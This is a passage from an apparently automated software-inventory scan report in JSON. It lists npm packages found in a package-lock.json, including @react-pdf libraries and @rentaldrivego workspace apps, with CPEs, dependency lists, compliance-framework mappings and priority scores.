managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9ecea192844aa50b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/renderer 3.4.5", "title": "@react-pdf/renderer 3.4.5", "description": "Package discovered: @react-pdf/renderer 3.4.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d2a573a75d297737", "name": "@react-pdf/renderer", "version": "3.4.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/renderer@3.4.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz", "integrity": "sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/font": "^2.5.2", "@react-pdf/layout": "^3.13.0", "@react-pdf/pdfkit": "^3.2.0", "@react-pdf/primitives": "^3.1.1", "@react-pdf/render": "^3.5.0", "@react-pdf/types": "^2.6.0", "events": "^3.3.0", "object-assign": "^4.1.1", "prop-types": "^15.6.2", "queue": "^6.0.1", "scheduler": "^0.17.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "25636a50f9953390", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/stylesheet 4.3.0", "title": "@react-pdf/stylesheet 4.3.0", "description": "Package discovered: @react-pdf/stylesheet 4.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "618f90b9a2f3d884", "name": "@react-pdf/stylesheet", "version": "4.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/stylesheet@4.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz", "integrity": "sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/fns": "2.2.1", "@react-pdf/types": "^2.6.0", "color-string": "^1.9.1", "hsl-to-hex": "^1.0.0", "media-engine": "^1.0.3", "postcss-value-parser": "^4.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "97286ac4a749af60", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/stylesheet 6.2.1", "title": "@react-pdf/stylesheet 6.2.1", "description": "Package discovered: @react-pdf/stylesheet 6.2.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ff4544477cbe31d7", "name": "@react-pdf/stylesheet", "version": "6.2.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/stylesheet@6.2.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz", "integrity": "sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A==", "dependencies": { "@react-pdf/fns": "3.1.3", "@react-pdf/types": "^2.11.1", "color-string": "^2.1.4", "hsl-to-hex": "^1.0.0", "media-engine": "^1.0.3", "postcss-value-parser": "^4.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "aac5b1fed64c15db", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/textkit 4.4.1", "title": "@react-pdf/textkit 4.4.1", "description": "Package discovered: @react-pdf/textkit 4.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9a502dcbe994e863", "name": "@react-pdf/textkit", "version": "4.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/textkit@4.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz", "integrity": "sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ==", "dependencies": { "@babel/runtime": "^7.20.13", "@react-pdf/fns": "2.2.1", "bidi-js": "^1.0.2", "hyphen": "^1.6.4", "unicode-properties": "^1.4.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d6967341a8bbb112", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @react-pdf/types 2.11.1", "title": "@react-pdf/types 2.11.1", "description": "Package discovered: @react-pdf/types 2.11.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3103913e34f4201d", "name": "@react-pdf/types", "version": "2.11.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@react-pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react-pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react_pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40react-pdf/types@2.11.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz", "integrity": "sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw==", "dependencies": { "@react-pdf/font": "^4.0.8", "@react-pdf/primitives": "^4.3.0", "@react-pdf/stylesheet": "^6.2.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f5a58400fb5d806d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/admin 1.0.0", "title": "@rentaldrivego/admin 1.0.0", "description": "Package discovered: @rentaldrivego/admin 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2a2c690594e77e74", "name": "@rentaldrivego/admin", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/admin@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@rentaldrivego/types": "*", "autoprefixer": "^10.4.19", "dayjs": "^1.11.11", "lucide-react": "^0.376.0", "next": "14.2.3", "postcss": "^8.4.38", "react": "^18.3.1", "react-dom": "^18.3.1", "recharts": "^2.12.7", "tailwindcss": "^3.4.3", "zod": "^3.23.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b0c291ec8410a1be", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/admin UNKNOWN", "title": "@rentaldrivego/admin UNKNOWN", "description": "Package discovered: @rentaldrivego/admin UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "22655bafcebdfea4", "name": "@rentaldrivego/admin", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/admin:\\@rentaldrivego\\/admin:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/admin", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "apps/admin", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "28e1ac461cbd16df", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/api 1.0.0", "title": "@rentaldrivego/api 1.0.0", "description": "Package discovered: @rentaldrivego/api 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "51dda2f8a6d52783", "name": "@rentaldrivego/api", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/api@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "", "integrity": "", "dependencies": { "@react-pdf/renderer": "^3.4.3", "@rentaldrivego/database": "*", "@rentaldrivego/types": "*", "bcryptjs": "^2.4.3", "cors": "^2.8.5", "dayjs": "^1.11.11", "express": "^4.19.2", "express-rate-limit": "^8.5.1", "firebase-admin": "^12.1.0", "helmet": "^7.1.0", "ioredis": "^5.3.2", "jsonwebtoken": "^9.0.2", "morgan": "^1.10.0", "multer": "^1.4.5-lts.1", "node-cron": "^3.0.3", "nodemailer": "^6.9.16", "otplib": "^12.0.1", "qrcode": "^1.5.3", "react": "^18.3.1", "react-dom": "^18.3.1", "resend": "^3.2.0", "socket.io": "^4.7.5", "twilio": "^5.1.0", "zod": "^3.23.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8fa1f2444979ec05", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @rentaldrivego/api UNKNOWN", "title": "@rentaldrivego/api UNKNOWN", "description": "Package discovered: @rentaldrivego/api UNKNOWN", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "731fc15901c69a78", "name": "@rentaldrivego/api", "version": "UNKNOWN", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@rentaldrivego\\/api:\\@rentaldrivego\\/api:*:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40rentaldrivego/api", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "apps/api", "integrity": "", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": 